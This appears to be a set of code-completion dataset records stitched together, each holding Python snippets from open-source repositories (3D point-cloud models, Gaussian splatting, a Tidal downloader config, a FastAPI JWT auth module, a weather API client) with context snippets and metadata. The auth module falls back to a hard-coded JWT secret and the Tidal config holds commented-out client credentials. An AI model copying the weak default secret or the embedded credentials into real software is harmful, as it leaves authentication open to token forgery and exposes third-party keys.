def forward(self, xyz, features):
|
class TransformerBlock(nn.Module):
def __init__(self, d_points, d_model, k) -> None:
super().__init__()
self.fc1 = nn.Linear(d_points, d_model)
self.fc2 = nn.Linear(d_model, d_points)
self.fc_delta = nn.Sequential(
nn.Linear(3, d_model),
nn.ReLU(),
nn.Linear(d_model, d_model)
)
self.fc_gamma = nn.Sequential(
nn.Linear(d_model, d_model),
nn.ReLU(),
nn.Linear(d_model, d_model)
)
self.w_qs = nn.Linear(d_model, d_model, bias=False)
self.w_ks = nn.Linear(d_model, d_model, bias=False)
self.w_vs = nn.Linear(d_model, d_model, bias=False)
self.k = k
# xyz: b x n x 3, features: b x n x f
def forward(self, xyz, features): | dists = square_distance(xyz, xyz) | 1 | 2023-12-15 13:13:01+00:00 | 2k |
uc-vision/taichi-splatting | taichi_splatting/scripts/fit_image_gaussians.py | [
{
"identifier": "RasterConfig",
"path": "taichi_splatting/data_types.py",
"snippet": "class RasterConfig:\n tile_size: int = 16\n\n # pixel tilin per thread in the backwards pass \n pixel_stride: Tuple[int, int] = (2, 2)\n\n margin_tiles: int = 3\n\n # cutoff N standard deviations from mean\n gaussian_scale: float = 3.0 \n \n # cull to an oriented box, otherwise an axis aligned bounding box\n tight_culling: bool = True \n\n clamp_max_alpha: float = 0.99\n alpha_threshold: float = 1. / 255.\n saturate_threshold: float = 0.9999"
},
{
"identifier": "render_gaussians",
"path": "taichi_splatting/renderer2d.py",
"snippet": "def project_gaussians2d(points: Gaussians2D) -> torch.Tensor:\ndef render_gaussians(\n gaussians: Gaussians2D,\n image_size: Tuple[Integral, Integral],\n raster_config: RasterConfig\n ):"
},
{
"identifier": "random_2d_gaussians",
"path": "taichi_splatting/tests/random_data.py",
"snippet": "def random_2d_gaussians(n, image_size, scale_factor=1.0, alpha_range=(0.1, 0.9), depth_range=(0.1, 100.0)):\n w, h = image_size\n\n position = torch.rand(n, 2) * torch.tensor([w, h], dtype=torch.float32).unsqueeze(0)\n depth = torch.rand((n, 1)) * (depth_range[1] - depth_range[0]) + depth_range[0]\n \n density_scale = scale_factor * w / (1 + math.sqrt(n))\n scaling = (torch.rand(n, 2) + 0.2) * density_scale \n\n rotation = torch.randn(n, 2) \n rotation = rotation / torch.norm(rotation, dim=1, keepdim=True)\n\n low, high = alpha_range\n alpha = torch.rand(n) * (high - low) + low\n\n return Gaussians2D(\n position=position,\n depth=depth,\n log_scaling=torch.log(scaling),\n rotation=rotation,\n alpha_logit=torch_proj.inverse_sigmoid(alpha),\n feature=torch.rand(n, 3),\n batch_size=(n,)\n )"
},
{
"identifier": "check_finite",
"path": "taichi_splatting/torch_ops/util.py",
"snippet": "def check_finite(tensor_dict):\n for k, v in tensor_dict.items():\n n = (~torch.isfinite(v)).sum()\n if n > 0:\n raise ValueError(f'Found {n} non-finite values in {k}')\n\n if v.grad is not None:\n n = (~torch.isfinite(v.grad)).sum()\n if n > 0:\n raise ValueError(f'Found {n} non-finite gradients in {k}')"
}
] | import cv2
import argparse
import taichi as ti
import torch
import time
from torch.optim import Adam
from taichi_splatting.data_types import RasterConfig
from taichi_splatting.renderer2d import render_gaussians, Gaussians2D
from taichi_splatting.tests.random_data import random_2d_gaussians
from taichi_splatting.torch_ops.util import check_finite | 1,338 |
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('image_file', type=str)
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--tile_size', type=int, default=16)
parser.add_argument('--n', type=int, default=20000)
parser.add_argument('--debug', action='store_true')
parser.add_argument('--show', action='store_true')
parser.add_argument('--profile', action='store_true')
parser.add_argument('--epoch', type=int, default=100, help='Number of iterations per measurement/profiling')
return parser.parse_args()
def optimizer(gaussians: Gaussians2D, base_lr=1.0):
learning_rates = dict(
position=0.1,
log_scaling=0.025,
rotation=0.005,
alpha_logit=0.2,
feature=0.01
)
params = {k: torch.nn.Parameter(x, requires_grad=True)
if k in learning_rates else x
for k, x in gaussians.items()}
param_groups = [
dict(params=[params[name]], lr=lr * base_lr, name=name)
for name, lr in learning_rates.items()
]
return Adam(param_groups), Gaussians2D(**params, batch_size=gaussians.batch_size)
def display_image(image):
image = (image.detach().clamp(0, 1) * 255).to(torch.uint8)
image = image.cpu().numpy()
cv2.imshow('rendered', image)
cv2.waitKey(1)
def main():
device = torch.device('cuda:0')
args = parse_args()
ref_image = cv2.imread(args.image_file)
h, w = ref_image.shape[:2]
ti.init(arch=ti.cuda, log_level=ti.INFO,
debug=args.debug, device_memory_GB=0.1)
print(f'Image size: {w}x{h}')
if args.show:
cv2.namedWindow('rendered', cv2.WINDOW_FULLSCREEN)
torch.manual_seed(args.seed)
gaussians = random_2d_gaussians(args.n, (w, h)).to(torch.device('cuda:0'))
opt, params = optimizer(gaussians, base_lr=1.0)
ref_image = torch.from_numpy(ref_image).to(dtype=torch.float32, device=device) / 255
config = RasterConfig(tile_size=args.tile_size)
while True:
if args.profile:
ti.profiler.clear_kernel_profiler_info()
start = time.time()
for _ in range(args.epoch):
opt.zero_grad()
|
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('image_file', type=str)
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--tile_size', type=int, default=16)
parser.add_argument('--n', type=int, default=20000)
parser.add_argument('--debug', action='store_true')
parser.add_argument('--show', action='store_true')
parser.add_argument('--profile', action='store_true')
parser.add_argument('--epoch', type=int, default=100, help='Number of iterations per measurement/profiling')
return parser.parse_args()
def optimizer(gaussians: Gaussians2D, base_lr=1.0):
learning_rates = dict(
position=0.1,
log_scaling=0.025,
rotation=0.005,
alpha_logit=0.2,
feature=0.01
)
params = {k: torch.nn.Parameter(x, requires_grad=True)
if k in learning_rates else x
for k, x in gaussians.items()}
param_groups = [
dict(params=[params[name]], lr=lr * base_lr, name=name)
for name, lr in learning_rates.items()
]
return Adam(param_groups), Gaussians2D(**params, batch_size=gaussians.batch_size)
def display_image(image):
image = (image.detach().clamp(0, 1) * 255).to(torch.uint8)
image = image.cpu().numpy()
cv2.imshow('rendered', image)
cv2.waitKey(1)
def main():
device = torch.device('cuda:0')
args = parse_args()
ref_image = cv2.imread(args.image_file)
h, w = ref_image.shape[:2]
ti.init(arch=ti.cuda, log_level=ti.INFO,
debug=args.debug, device_memory_GB=0.1)
print(f'Image size: {w}x{h}')
if args.show:
cv2.namedWindow('rendered', cv2.WINDOW_FULLSCREEN)
torch.manual_seed(args.seed)
gaussians = random_2d_gaussians(args.n, (w, h)).to(torch.device('cuda:0'))
opt, params = optimizer(gaussians, base_lr=1.0)
ref_image = torch.from_numpy(ref_image).to(dtype=torch.float32, device=device) / 255
config = RasterConfig(tile_size=args.tile_size)
while True:
if args.profile:
ti.profiler.clear_kernel_profiler_info()
start = time.time()
for _ in range(args.epoch):
opt.zero_grad()
| image = render_gaussians(params, (w, h), config) | 1 | 2023-12-17 15:26:52+00:00 | 2k |
exislow/tidal-dl-ng | tidal_dl_ng/config.py | [
{
"identifier": "SingletonMeta",
"path": "tidal_dl_ng/helper/decorator.py",
"snippet": "class SingletonMeta(type):\n \"\"\"\n The Singleton class can be implemented in different ways in Python. Some\n possible methods include: base class, decorator, metaclass. We will use the\n metaclass because it is best suited for this purpose.\n \"\"\"\n\n _instances: ClassVar[dict] = {}\n\n def __call__(cls, *args, **kwargs):\n \"\"\"\n Possible changes to the value of the `__init__` argument do not affect\n the returned instance.\n \"\"\"\n if cls not in cls._instances:\n instance = super().__call__(*args, **kwargs)\n cls._instances[cls] = instance\n\n return cls._instances[cls]"
},
{
"identifier": "path_base",
"path": "tidal_dl_ng/helper/path.py",
"snippet": "def path_base() -> str:\n path_config: str = \".config\"\n path_base: str = os.path.join(path_home(), path_config, __name_display__)\n\n return path_base"
},
{
"identifier": "path_file_settings",
"path": "tidal_dl_ng/helper/path.py",
"snippet": "def path_file_settings() -> str:\n # TODO: Remove this soon. Only for migration to new dir.\n old = os.path.join(path_home(), \".tidal-dl-ng_settings.json\")\n if os.path.isfile(old):\n os.makedirs(path_base(), exist_ok=True)\n os.rename(old, os.path.join(path_base(), \"settings.json\"))\n\n return os.path.join(path_base(), \"settings.json\")"
},
{
"identifier": "path_file_token",
"path": "tidal_dl_ng/helper/path.py",
"snippet": "def path_file_token() -> str:\n # TODO: Remove this soon. Only for migration to new dir.\n old = os.path.join(path_home(), \".tidal-dl-ng_token.json\")\n if os.path.isfile(old):\n os.makedirs(path_base(), exist_ok=True)\n os.rename(old, os.path.join(path_base(), \"token.json\"))\n\n return os.path.join(path_base(), \"token.json\")"
},
{
"identifier": "Settings",
"path": "tidal_dl_ng/model/cfg.py",
"snippet": "class Settings:\n skip_existing: SkipExisting = SkipExisting.Disabled\n # TODO: Implement cover download to a separate file.\n # album_cover_save: bool = True\n lyrics_save: bool = False\n # TODO: Implement API KEY selection.\n # api_key_index: bool = 0\n # TODO: Implement album info download to separate file.\n # album_info_save: bool = False\n video_download: bool = True\n # TODO: Implement multi threading for downloads.\n # multi_thread: bool = False\n download_delay: bool = True\n download_base_path: str = \"./download\"\n quality_audio: Quality = Quality.low_320k\n quality_video: QualityVideo = QualityVideo.P480\n format_album: str = \"Albums/{artist_name} - {album_title}/{track_num}. {artist_name} - {track_title}\"\n format_playlist: str = \"Playlists/{playlist_name}/{artist_name} - {track_title}\"\n format_mix: str = \"Mix/{mix_name}/{artist_name} - {track_title}\"\n format_track: str = \"Tracks/{artist_name} - {track_title}\"\n format_video: str = \"Videos/{artist_name} - {track_title}\"\n video_convert_mp4: bool = True\n metadata_cover_dimension: CoverDimensions = CoverDimensions.Px320"
},
{
"identifier": "Token",
"path": "tidal_dl_ng/model/cfg.py",
"snippet": "class Token:\n token_type: str | None = None\n access_token: str | None = None\n refresh_token: str | None = None\n expiry_time: float = 0.0"
}
] | import os
import shutil
import tidalapi
from collections.abc import Callable
from json import JSONDecodeError
from typing import Any
from requests import HTTPError
from tidal_dl_ng.helper.decorator import SingletonMeta
from tidal_dl_ng.helper.path import path_base, path_file_settings, path_file_token
from tidal_dl_ng.model.cfg import Settings as ModelSettings
from tidal_dl_ng.model.cfg import Token as ModelToken | 1,506 |
class BaseConfig:
data: ModelSettings | ModelToken = None
file_path: str = None
cls_model: object = None
path_base: str = path_base()
def save(self) -> None:
data_json = self.data.to_json()
# Try to create the base folder.
os.makedirs(self.path_base, exist_ok=True)
with open(self.file_path, encoding="utf-8", mode="w") as f:
f.write(data_json)
def set_option(self, key: str, value: Any) -> None:
setattr(self.data, key, value)
def read(self, path: str) -> bool:
result = False
try:
with open(path, encoding="utf-8") as f:
settings_json = f.read()
self.data = self.cls_model.from_json(settings_json)
result = True
except (JSONDecodeError, TypeError, FileNotFoundError, ValueError) as e:
if isinstance(e, ValueError):
path_bak = path + ".bak"
# First check if a backup file already exists. If yes, remove it.
if os.path.exists(path_bak):
os.remove(path_bak)
# Move the invalid config file to the backup location.
shutil.move(path, path_bak)
# TODO: Implement better global logger.
print(
"Something is wrong with your config. Maybe it is not compatible anymore due to a new app version."
f" You can find a backup of your old config here: '{path_bak}'. A new default config was created."
)
self.data = self.cls_model()
# Call save in case we need to update the saved config due to changes in code.
# TODO: Compare if config in memory and on disk is different. Otherwise no write operation.
self.save()
return result
class Settings(BaseConfig, metaclass=SingletonMeta):
cls_model = ModelSettings
data = None
def __init__(self):
self.file_path = path_file_settings()
self.read(self.file_path)
class Tidal(BaseConfig, metaclass=SingletonMeta):
cls_model = ModelToken
session: tidalapi.Session = None
data: ModelToken = None
token_from_storage: bool = False
settings: Settings = None
def __init__(self, settings: Settings = None):
self.session = tidalapi.Session()
# self.session.config.client_id = "km8T1xS355y7dd3H"
# self.session.config.client_secret = "vcmeGW1OuZ0fWYMCSZ6vNvSLJlT3XEpW0ambgYt5ZuI="
self.session.video_quality = tidalapi.VideoQuality.high
|
class BaseConfig:
data: ModelSettings | ModelToken = None
file_path: str = None
cls_model: object = None
path_base: str = path_base()
def save(self) -> None:
data_json = self.data.to_json()
# Try to create the base folder.
os.makedirs(self.path_base, exist_ok=True)
with open(self.file_path, encoding="utf-8", mode="w") as f:
f.write(data_json)
def set_option(self, key: str, value: Any) -> None:
setattr(self.data, key, value)
def read(self, path: str) -> bool:
result = False
try:
with open(path, encoding="utf-8") as f:
settings_json = f.read()
self.data = self.cls_model.from_json(settings_json)
result = True
except (JSONDecodeError, TypeError, FileNotFoundError, ValueError) as e:
if isinstance(e, ValueError):
path_bak = path + ".bak"
# First check if a backup file already exists. If yes, remove it.
if os.path.exists(path_bak):
os.remove(path_bak)
# Move the invalid config file to the backup location.
shutil.move(path, path_bak)
# TODO: Implement better global logger.
print(
"Something is wrong with your config. Maybe it is not compatible anymore due to a new app version."
f" You can find a backup of your old config here: '{path_bak}'. A new default config was created."
)
self.data = self.cls_model()
# Call save in case we need to update the saved config due to changes in code.
# TODO: Compare if config in memory and on disk is different. Otherwise no write operation.
self.save()
return result
class Settings(BaseConfig, metaclass=SingletonMeta):
cls_model = ModelSettings
data = None
def __init__(self):
self.file_path = path_file_settings()
self.read(self.file_path)
class Tidal(BaseConfig, metaclass=SingletonMeta):
cls_model = ModelToken
session: tidalapi.Session = None
data: ModelToken = None
token_from_storage: bool = False
settings: Settings = None
def __init__(self, settings: Settings = None):
self.session = tidalapi.Session()
# self.session.config.client_id = "km8T1xS355y7dd3H"
# self.session.config.client_secret = "vcmeGW1OuZ0fWYMCSZ6vNvSLJlT3XEpW0ambgYt5ZuI="
self.session.video_quality = tidalapi.VideoQuality.high | self.file_path = path_file_token() | 3 | 2023-12-19 23:05:47+00:00 | 2k |
smoores-dev/storyteller | storyteller/api/auth.py | [
{
"identifier": "InviteAccept",
"path": "storyteller/api/models.py",
"snippet": "class InviteAccept(BaseModel):\n username: str\n full_name: str\n email: str\n password: str\n invite_key: str"
},
{
"identifier": "TokenData",
"path": "storyteller/api/models.py",
"snippet": "class TokenData(BaseModel):\n username: str"
},
{
"identifier": "get_user",
"path": "storyteller/api/database/users.py",
"snippet": "def get_user(username: str):\n cursor = connection.execute(\n \"\"\"\n SELECT\n username,\n full_name,\n email,\n hashed_password,\n book_create,\n book_read,\n book_process,\n book_download,\n book_list,\n user_create,\n user_list,\n user_read,\n user_delete,\n settings_update\n FROM user\n JOIN user_permission\n ON user.user_permission_id = user_permission.id\n WHERE username = :username\n \"\"\",\n {\"username\": username},\n )\n\n (\n username,\n full_name,\n email,\n hashed_password,\n book_create,\n book_read,\n book_process,\n book_download,\n book_list,\n user_create,\n user_list,\n user_read,\n user_delete,\n settings_update,\n ) = cursor.fetchone()\n\n return DBUser(\n username=username,\n full_name=full_name,\n email=email,\n permissions=UserPermissions(\n book_create=book_create,\n book_read=book_read,\n book_process=book_process,\n book_download=book_download,\n book_list=book_list,\n user_create=user_create,\n user_list=user_list,\n user_read=user_read,\n user_delete=user_delete,\n settings_update=settings_update,\n ),\n hashed_password=hashed_password,\n )"
},
{
"identifier": "user_has_permission",
"path": "storyteller/api/database/users.py",
"snippet": "def user_has_permission(username: str, permission: str):\n cursor = connection.execute(\n f\"\"\"\n SELECT {permission}\n FROM user_permission\n JOIN user\n ON user.user_permission_id = user_permission.id\n WHERE user.username = :username\n \"\"\",\n {\"username\": username, \"permission\": permission},\n )\n\n (has_permission,) = cursor.fetchone()\n\n return has_permission"
},
{
"identifier": "verify_invite",
"path": "storyteller/api/database/invites.py",
"snippet": "def verify_invite(email: str, key: str):\n cursor = connection.execute(\n \"\"\"\n SELECT id\n FROM invite\n WHERE email=:email\n AND key=:key\n \"\"\",\n {\"email\": email, \"key\": key},\n )\n\n return cursor.fetchone() is None"
}
] | import base64
import json
import os
from datetime import timedelta, datetime
from typing import Annotated, Optional, cast
from urllib.parse import unquote
from jose import JWTError, jwt
from fastapi import Body, Depends, HTTPException, Request, status
from fastapi.security import OAuth2PasswordBearer
from passlib.context import CryptContext
from starlette.status import HTTP_401_UNAUTHORIZED
from .models import InviteAccept, TokenData
from .database import get_user, user_has_permission, verify_invite as verify_invite_db | 1,332 |
SECRET_KEY = os.getenv("STORYTELLER_SECRET_KEY", "<notsosecret>")
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_DAYS = 10
class OAuth2PasswordBearerWithCookie(OAuth2PasswordBearer):
async def __call__(self, request: Request) -> Optional[str]:
header_param = None
try:
header_param = await super().__call__(request)
except HTTPException:
pass
if header_param is not None:
return header_param
auth_cookie = request.cookies.get("st_token")
if not auth_cookie:
if self.auto_error:
raise HTTPException(
status_code=HTTP_401_UNAUTHORIZED,
detail="Not authenticated",
headers={"WWW-Authenticate": "Bearer"},
)
else:
return None
auth_token = json.loads(base64.urlsafe_b64decode(unquote(auth_cookie)))
access_token = auth_token["access_token"]
if not access_token:
if self.auto_error:
raise HTTPException(
status_code=HTTP_401_UNAUTHORIZED,
detail="Not authenticated",
headers={"WWW-Authenticate": "Bearer"},
)
else:
return None
return access_token
oauth2_scheme = OAuth2PasswordBearerWithCookie(tokenUrl="token")
password_context = CryptContext(schemes=["argon2"], deprecated="auto")
def verify_password(plain_password: str, hashed_password: str):
return password_context.verify(plain_password, hashed_password)
def get_password_hash(password: str):
return password_context.hash(password)
def authenticate_user(username: str, password: str):
try:
user = get_user(username)
except Exception:
return None
if not verify_password(password, user.hashed_password):
return None
return user
def create_access_token(data: dict, expires_delta: timedelta | None = None):
to_encode = data.copy()
if expires_delta:
expire = datetime.utcnow() + expires_delta
else:
expire = datetime.utcnow() + timedelta(days=ACCESS_TOKEN_EXPIRE_DAYS)
to_encode.update({"exp": expire})
encoded_jwt = jwt.encode(to_encode, SECRET_KEY, algorithm=ALGORITHM)
return encoded_jwt
unauthorized = HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Invalid authentication credentials",
headers={"WWW-Authenticate": "Bearer"},
)
def verify_token(token: Annotated[str, Depends(oauth2_scheme)]):
try:
payload = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM])
username: str | None = cast(str | None, payload.get("sub"))
if username is None:
raise unauthorized
token_data = TokenData(username=username)
except JWTError:
raise unauthorized
return token_data
def verify_invite(invite: Annotated[InviteAccept, Body()]):
|
SECRET_KEY = os.getenv("STORYTELLER_SECRET_KEY", "<notsosecret>")
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_DAYS = 10
class OAuth2PasswordBearerWithCookie(OAuth2PasswordBearer):
async def __call__(self, request: Request) -> Optional[str]:
header_param = None
try:
header_param = await super().__call__(request)
except HTTPException:
pass
if header_param is not None:
return header_param
auth_cookie = request.cookies.get("st_token")
if not auth_cookie:
if self.auto_error:
raise HTTPException(
status_code=HTTP_401_UNAUTHORIZED,
detail="Not authenticated",
headers={"WWW-Authenticate": "Bearer"},
)
else:
return None
auth_token = json.loads(base64.urlsafe_b64decode(unquote(auth_cookie)))
access_token = auth_token["access_token"]
if not access_token:
if self.auto_error:
raise HTTPException(
status_code=HTTP_401_UNAUTHORIZED,
detail="Not authenticated",
headers={"WWW-Authenticate": "Bearer"},
)
else:
return None
return access_token
oauth2_scheme = OAuth2PasswordBearerWithCookie(tokenUrl="token")
password_context = CryptContext(schemes=["argon2"], deprecated="auto")
def verify_password(plain_password: str, hashed_password: str):
return password_context.verify(plain_password, hashed_password)
def get_password_hash(password: str):
return password_context.hash(password)
def authenticate_user(username: str, password: str):
try:
user = get_user(username)
except Exception:
return None
if not verify_password(password, user.hashed_password):
return None
return user
def create_access_token(data: dict, expires_delta: timedelta | None = None):
to_encode = data.copy()
if expires_delta:
expire = datetime.utcnow() + expires_delta
else:
expire = datetime.utcnow() + timedelta(days=ACCESS_TOKEN_EXPIRE_DAYS)
to_encode.update({"exp": expire})
encoded_jwt = jwt.encode(to_encode, SECRET_KEY, algorithm=ALGORITHM)
return encoded_jwt
unauthorized = HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Invalid authentication credentials",
headers={"WWW-Authenticate": "Bearer"},
)
def verify_token(token: Annotated[str, Depends(oauth2_scheme)]):
try:
payload = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM])
username: str | None = cast(str | None, payload.get("sub"))
if username is None:
raise unauthorized
token_data = TokenData(username=username)
except JWTError:
raise unauthorized
return token_data
def verify_invite(invite: Annotated[InviteAccept, Body()]): | if verify_invite_db(invite.email, invite.invite_key): | 1 | 2023-12-15 16:07:12+00:00 | 2k |
noprobelm/terminal-cellular-automaton | tests/test_cell.py | [
{
"identifier": "MooreCell",
"path": "terminal_cellular_automaton/cell.py",
"snippet": "class MooreCell:\n \"\"\"A cell that references members of a MooreNeighborhood\n\n +---+---+---+\n | 1 | 2 | 3 |\n +---+---+---+\n | 4 | C | 5 |\n +---+---+---+\n | 6 | 7 | 8 |\n +---+---+---+\n\n \"\"\"\n\n neighbors: Tuple[Coordinate, ...] = (\n # Upper left\n Coordinate(-1, -1),\n # Upper\n Coordinate(0, -1),\n # Upper right\n Coordinate(1, -1),\n # Right\n Coordinate(1, 0),\n # Lower right\n Coordinate(1, 1),\n # Lower\n Coordinate(0, 1),\n # Lower left\n Coordinate(-1, 1),\n # Left\n Coordinate(-1, 0),\n )\n\n def __init__(self, coord: Coordinate) -> None:\n \"\"\"Initializes an instance of the MooreCell class\"\"\"\n self.coord = coord\n\n def get_neighbors(self, max_coord: Coordinate) -> list[Coordinate]:\n \"\"\"Gets neighbors based on the max coord.\n\n Neighbors will usually be the eight surrounding cells in an automaton, but for cells living along the min/max\n coords, neighbors will wrap around to the other side of this grid. This ensures continuity and enables\n a life to wrap around the other side of the simulation once it reaches a boundary, emulating a pseudo-infinite\n space.\n\n Args:\n max_coord (Coordinate): The maximum coordinate found in the underlying Automaton\n\n Returns:\n A list of the cell's neighbors\n \"\"\"\n neighbors = []\n for nc in self.neighbors:\n n = nc + self.coord\n if n.x < 0 and n.y < 0:\n n = Coordinate(max_coord.x, max_coord.y)\n elif n.x > max_coord.x and n.y > max_coord.y:\n n = Coordinate(0, 0)\n elif n.x < 0 and n.y > max_coord.y:\n n = Coordinate(max_coord.x, 0)\n elif n.y < 0 and n.x > max_coord.x:\n n = Coordinate(0, max_coord.y)\n elif n.x > max_coord.x:\n n = Coordinate(0, n.y)\n elif n.y < 0:\n n = Coordinate(n.x, max_coord.y)\n elif n.y > max_coord.y:\n n = Coordinate(n.x, 0)\n elif n.x < 0:\n n = Coordinate(max_coord.x, n.y)\n elif n.x > max_coord.x:\n n = Coordinate(0, n.y)\n\n neighbors.append(n)\n\n return neighbors"
},
{
"identifier": "Coordinate",
"path": "terminal_cellular_automaton/coordinate.py",
"snippet": "class Coordinate:\n \"\"\"An x/y coordinate to reference location in a 2 dimensional matrix\"\"\"\n\n x: int\n y: int\n\n def __add__(self, other: Coordinate) -> Coordinate:\n \"\"\"Returns the sum of one coordinate and another. Primarily used to identify neighbors\"\"\"\n return Coordinate(self.x + other.x, self.y + other.y)\n\n def __sub__(self, other: Coordinate) -> Coordinate:\n \"\"\"Returns the sum of one coordinate and another. Primarily used to identify neighbors\"\"\"\n return Coordinate(self.x - other.x, self.y - other.y)\n\n def __contains__(self, other: Coordinate) -> bool:\n if 0 <= other.x <= self.x and 0 <= other.y <= self.y:\n return True\n return False"
}
] | from ward import test, fixture
from terminal_cellular_automaton.cell import MooreCell
from terminal_cellular_automaton.coordinate import Coordinate | 970 | """Tests the get_neighbors method for all Cell types"""
@fixture
def max_coord():
return Coordinate(2, 2)
@test("A centrally located MooreCell will have 8 neighbors in its immediate area")
def _():
| """Tests the get_neighbors method for all Cell types"""
@fixture
def max_coord():
return Coordinate(2, 2)
@test("A centrally located MooreCell will have 8 neighbors in its immediate area")
def _(): | c = MooreCell(Coordinate(1, 1)) | 0 | 2023-12-20 21:47:46+00:00 | 2k |
zyrant/SPGroup3D | mmdet3d/models/dense_heads/fcaf3d_head.py | [
{
"identifier": "rotation_3d_in_axis",
"path": "mmdet3d/core/bbox/structures/utils.py",
"snippet": "@array_converter(apply_to=('points', 'angles'))\ndef rotation_3d_in_axis(points,\n angles,\n axis=0,\n return_mat=False,\n clockwise=False):\n \"\"\"Rotate points by angles according to axis.\n\n Args:\n points (np.ndarray | torch.Tensor | list | tuple ):\n Points of shape (N, M, 3).\n angles (np.ndarray | torch.Tensor | list | tuple | float):\n Vector of angles in shape (N,)\n axis (int, optional): The axis to be rotated. Defaults to 0.\n return_mat: Whether or not return the rotation matrix (transposed).\n Defaults to False.\n clockwise: Whether the rotation is clockwise. Defaults to False.\n\n Raises:\n ValueError: when the axis is not in range [0, 1, 2], it will\n raise value error.\n\n Returns:\n (torch.Tensor | np.ndarray): Rotated points in shape (N, M, 3).\n \"\"\"\n batch_free = len(points.shape) == 2\n if batch_free:\n points = points[None]\n\n if isinstance(angles, float) or len(angles.shape) == 0:\n angles = torch.full(points.shape[:1], angles)\n\n assert len(points.shape) == 3 and len(angles.shape) == 1 \\\n and points.shape[0] == angles.shape[0], f'Incorrect shape of points ' \\\n f'angles: {points.shape}, {angles.shape}'\n\n assert points.shape[-1] in [2, 3], \\\n f'Points size should be 2 or 3 instead of {points.shape[-1]}'\n\n rot_sin = torch.sin(angles)\n rot_cos = torch.cos(angles)\n ones = torch.ones_like(rot_cos)\n zeros = torch.zeros_like(rot_cos)\n\n if points.shape[-1] == 3:\n if axis == 1 or axis == -2:\n rot_mat_T = torch.stack([\n torch.stack([rot_cos, zeros, -rot_sin]),\n torch.stack([zeros, ones, zeros]),\n torch.stack([rot_sin, zeros, rot_cos])\n ])\n elif axis == 2 or axis == -1:\n rot_mat_T = torch.stack([\n torch.stack([rot_cos, rot_sin, zeros]),\n torch.stack([-rot_sin, rot_cos, zeros]),\n torch.stack([zeros, zeros, ones])\n ])\n elif axis == 0 or axis == -3:\n rot_mat_T = torch.stack([\n torch.stack([ones, zeros, zeros]),\n torch.stack([zeros, rot_cos, rot_sin]),\n torch.stack([zeros, -rot_sin, rot_cos])\n ])\n else:\n raise ValueError(f'axis should in range '\n f'[-3, -2, -1, 0, 1, 2], got {axis}')\n else:\n rot_mat_T = torch.stack([\n torch.stack([rot_cos, rot_sin]),\n torch.stack([-rot_sin, rot_cos])\n ])\n\n if clockwise:\n rot_mat_T = rot_mat_T.transpose(0, 1)\n\n if points.shape[0] == 0:\n points_new = points\n else:\n points_new = torch.einsum('aij,jka->aik', points, rot_mat_T)\n\n if batch_free:\n points_new = points_new.squeeze(0)\n\n if return_mat:\n rot_mat_T = torch.einsum('jka->ajk', rot_mat_T)\n if batch_free:\n rot_mat_T = rot_mat_T.squeeze(0)\n return points_new, rot_mat_T\n else:\n return points_new"
},
{
"identifier": "HEADS",
"path": "mmdet3d/models/builder.py",
"snippet": "HEADS = MODELS"
},
{
"identifier": "build_loss",
"path": "mmdet3d/models/builder.py",
"snippet": "def build_loss(cfg):\n \"\"\"Build loss function.\"\"\"\n if cfg['type'] in LOSSES._module_dict.keys():\n return LOSSES.build(cfg)\n elif cfg['type'] in MMDET_LOSSES._module_dict.keys():\n return MMDET_LOSSES.build(cfg)\n else:\n return MMSEG_LOSSES.build(cfg)"
}
] | import MinkowskiEngine as ME
import warnings
import torch
from mmcv.cnn import Scale, bias_init_with_prob
from mmcv.ops import nms3d, nms3d_normal
from mmcv.runner.base_module import BaseModule
from torch import nn
from mmdet3d.core.bbox.structures import rotation_3d_in_axis
from mmdet3d.models import HEADS, build_loss
from mmdet.core import reduce_mean | 1,205 | # Copyright (c) OpenMMLab. All rights reserved.
# Adapted from https://github.com/SamsungLabs/fcaf3d/blob/master/mmdet3d/models/dense_heads/fcaf3d_neck_with_head.py # noqa
try:
except ImportError:
warnings.warn(
'Please follow `getting_started.md` to install MinkowskiEngine.')
| # Copyright (c) OpenMMLab. All rights reserved.
# Adapted from https://github.com/SamsungLabs/fcaf3d/blob/master/mmdet3d/models/dense_heads/fcaf3d_neck_with_head.py # noqa
try:
except ImportError:
warnings.warn(
'Please follow `getting_started.md` to install MinkowskiEngine.')
| @HEADS.register_module() | 1 | 2023-12-21 12:50:35+00:00 | 2k |
jdejaegh/irm-kmi-ha | custom_components/irm_kmi/config_flow.py | [
{
"identifier": "IrmKmiApiClient",
"path": "custom_components/irm_kmi/api.py",
"snippet": "class IrmKmiApiClient:\n \"\"\"API client for IRM KMI weather data\"\"\"\n COORD_DECIMALS = 6\n\n def __init__(self, session: aiohttp.ClientSession) -> None:\n self._session = session\n self._base_url = \"https://app.meteo.be/services/appv4/\"\n\n async def get_forecasts_coord(self, coord: dict) -> dict:\n \"\"\"Get forecasts for given city.\"\"\"\n assert 'lat' in coord\n assert 'long' in coord\n coord['lat'] = round(coord['lat'], self.COORD_DECIMALS)\n coord['long'] = round(coord['long'], self.COORD_DECIMALS)\n\n response = await self._api_wrapper(params={\"s\": \"getForecasts\", \"k\": _api_key(\"getForecasts\")} | coord)\n return await response.json()\n\n async def get_image(self, url, params: dict | None = None) -> bytes:\n \"\"\"Get the image at the specified url with the parameters\"\"\"\n r: ClientResponse = await self._api_wrapper(base_url=url, params={} if params is None else params)\n return await r.read()\n\n async def _api_wrapper(\n self,\n params: dict,\n base_url: str | None = None,\n path: str = \"\",\n method: str = \"get\",\n data: dict | None = None,\n headers: dict | None = None,\n ) -> any:\n \"\"\"Get information from the API.\"\"\"\n\n try:\n async with async_timeout.timeout(10):\n response = await self._session.request(\n method=method,\n url=f\"{self._base_url if base_url is None else base_url}{path}\",\n headers=headers,\n json=data,\n params=params\n )\n response.raise_for_status()\n return response\n\n except asyncio.TimeoutError as exception:\n raise IrmKmiApiCommunicationError(\"Timeout error fetching information\") from exception\n except (aiohttp.ClientError, socket.gaierror) as exception:\n raise IrmKmiApiCommunicationError(\"Error fetching information\") from exception\n except Exception as exception: # pylint: disable=broad-except\n raise IrmKmiApiError(f\"Something really wrong happened! {exception}\") from exception"
},
{
"identifier": "CONF_DARK_MODE",
